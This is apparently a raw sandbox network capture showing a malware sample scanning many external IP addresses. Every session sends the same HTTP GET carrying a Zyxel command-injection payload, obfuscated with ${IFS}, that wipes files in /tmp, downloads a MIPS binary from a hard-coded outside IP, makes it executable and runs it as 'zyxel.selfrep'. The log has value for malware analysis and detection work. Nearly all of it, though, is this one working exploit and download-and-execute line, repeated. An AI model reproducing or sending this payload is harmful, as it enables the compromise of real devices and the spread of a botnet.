                                            Jan 14, 2024 15:50:43.496201038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5587192.168.2.2348288116.27.71.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496237040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5588192.168.2.2356416162.53.239.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496293068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5589192.168.2.2354070157.57.127.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496293068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5590192.168.2.234929275.184.8.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496320009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5591192.168.2.2338806169.146.101.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496332884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5592192.168.2.233396895.180.168.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496370077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5593192.168.2.2334562177.168.148.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496416092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5594192.168.2.2350160146.71.133.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496455908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5595192.168.2.234920260.110.43.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496495962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5596192.168.2.2353702149.122.40.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496776104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5597192.168.2.2335862116.81.38.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.499531031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5598192.168.2.236030825.107.183.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.499543905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5599192.168.2.2351320157.235.134.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.499571085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5600192.168.2.234449283.160.104.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.499607086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5601192.168.2.2339548192.148.255.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.499629974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5602192.168.2.2354686100.187.185.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.499660015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5603192.168.2.2347262195.247.192.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.499712944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5604192.168.2.235083631.102.213.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.507981062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5605192.168.2.2345740175.150.62.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508016109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5606192.168.2.2354584150.97.55.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508060932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5607192.168.2.2337976122.115.207.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508085012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5608192.168.2.2350334194.194.254.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508132935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5609192.168.2.235024653.93.161.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508162975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5610192.168.2.235308478.2.77.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508169889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5611192.168.2.2345264158.192.121.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508184910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5612192.168.2.233964281.92.125.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508203983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5613192.168.2.2352204135.55.215.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508260012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5614192.168.2.2346776185.103.239.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508265972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5615192.168.2.2344676168.114.203.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508290052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5616192.168.2.2355074162.179.32.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508331060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5617192.168.2.235320075.120.146.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508364916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5618192.168.2.2357356102.99.178.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508388042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5619192.168.2.2351624134.83.3.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508414984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5620192.168.2.2342762126.21.128.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508418083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5621192.168.2.2333272121.43.254.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508425951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5622192.168.2.234173017.54.34.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508492947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5623192.168.2.2360522119.222.141.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508512974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5624192.168.2.235040047.75.112.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508539915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5625192.168.2.233652068.86.24.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508568048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5626192.168.2.233690865.245.21.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508626938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5627192.168.2.234176649.32.202.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508651972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5628192.168.2.2355132147.148.62.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508655071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5629192.168.2.235744442.151.172.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508670092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5630192.168.2.2341778164.215.235.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508706093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5631192.168.2.2356246221.219.125.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508718014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5632192.168.2.2341024114.206.131.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508721113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5633192.168.2.233503287.61.197.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508742094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5634192.168.2.235667437.54.24.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508794069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5635192.168.2.2334284140.148.251.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508846045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5636192.168.2.2346638163.225.111.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508847952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5637192.168.2.2356904197.219.223.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508852005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5638192.168.2.2337394115.25.63.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508882999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5639192.168.2.2336812119.57.123.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508913994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5640192.168.2.235118484.227.106.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508945942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5641192.168.2.235873871.61.41.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.508965969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5642192.168.2.2351890171.38.151.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509006977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5643192.168.2.2345710137.246.236.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509016037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5644192.168.2.2354456133.71.224.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509056091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5645192.168.2.234321083.75.201.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509098053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5646192.168.2.233987225.156.29.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509115934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5647192.168.2.2346818103.94.20.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509159088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5648192.168.2.235244624.203.72.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509207010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5649192.168.2.2334354202.78.43.218443
                                            TimestampBytes transferredDirectionData
